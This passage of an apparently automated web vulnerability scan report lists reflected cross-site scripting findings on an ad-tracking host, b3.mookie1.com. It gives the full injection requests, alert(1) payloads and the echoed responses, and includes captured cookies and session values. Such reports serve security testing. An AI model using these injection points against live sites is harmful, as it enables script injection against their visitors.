Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206209

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1945329352/x5487b9c"><script>alert(1)</script>1329fd159c6/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.229. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662816311@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fa25'-alert(1)-'16457a0035f was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662816311@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work4fa25'-alert(1)-'16457a0035f HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206209

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2016
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work4fa25'-alert(1)-'16457a0035f';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.230. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662816311@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69b92'-alert(1)-'5b29aa9e3d9 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662816311@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions69b92'-alert(1)-'5b29aa9e3d9&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206209

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2016
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions69b92'-alert(1)-'5b29aa9e3d9&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
...[SNIP]...

1.231. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662816311@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb5aa'-alert(1)-'c318e89da4c was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662816311@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxisfb5aa'-alert(1)-'c318e89da4c&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206209

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2072
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxisfb5aa'-alert(1)-'c318e89da4c&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xa
...[SNIP]...

1.232. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662816311@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89f5d'-alert(1)-'3d370fa7f89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662816311@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work&89f5d'-alert(1)-'3d370fa7f89=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206209

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2019
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/solutions&Section=Work&89f5d'-alert(1)-'3d370fa7f89=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.233. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662888868@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f4ca'-alert(1)-'08118a8ac2e was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662888868@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager5f4ca'-alert(1)-'08118a8ac2e&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/de/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206412

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2140
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
equest and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager5f4ca'-alert(1)-'08118a8ac2e&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pai
...[SNIP]...

1.234. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [Page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662888868@x54

Issue detail

The value of the Page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed3e3'-alert(1)-'c5cd0a395c6 was submitted in the Page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662888868@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPostinged3e3'-alert(1)-'c5cd0a395c6 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/de/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206412

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2140
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPostinged3e3'-alert(1)-'c5cd0a395c6';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.235. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662888868@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d98c"><script>alert(1)</script>719e761e2ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis5d98c"><script>alert(1)</script>719e761e2ce/1662888868@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/de/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206412

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:28:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis5d98c"><script>alert(1)</script>719e761e2ce/1745310383/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.236. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662888868@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f509"><script>alert(1)</script>7fd5b9abb6c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1662888868@x544f509"><script>alert(1)</script>7fd5b9abb6c?&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/de/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206412

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:28:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/899983000/x544f509"><script>alert(1)</script>7fd5b9abb6c/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.237. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662888868@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90871'-alert(1)-'c67007dd988 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662888868@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers90871'-alert(1)-'c67007dd988&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/de/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206412

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2140
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers90871'-alert(1)-'c67007dd988&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsec
...[SNIP]...

1.238. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662888868@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18c79'-alert(1)-'19eba70a78c was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662888868@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager18c79'-alert(1)-'19eba70a78c&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/de/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206412

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2140
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager18c79'-alert(1)-'19eba70a78c&Section=Careers&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section
...[SNIP]...

1.239. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662888868@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 964b4'-alert(1)-'662d9db0b0c was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662888868@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York964b4'-alert(1)-'662d9db0b0c&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/de/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206412

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2196
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
*/
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
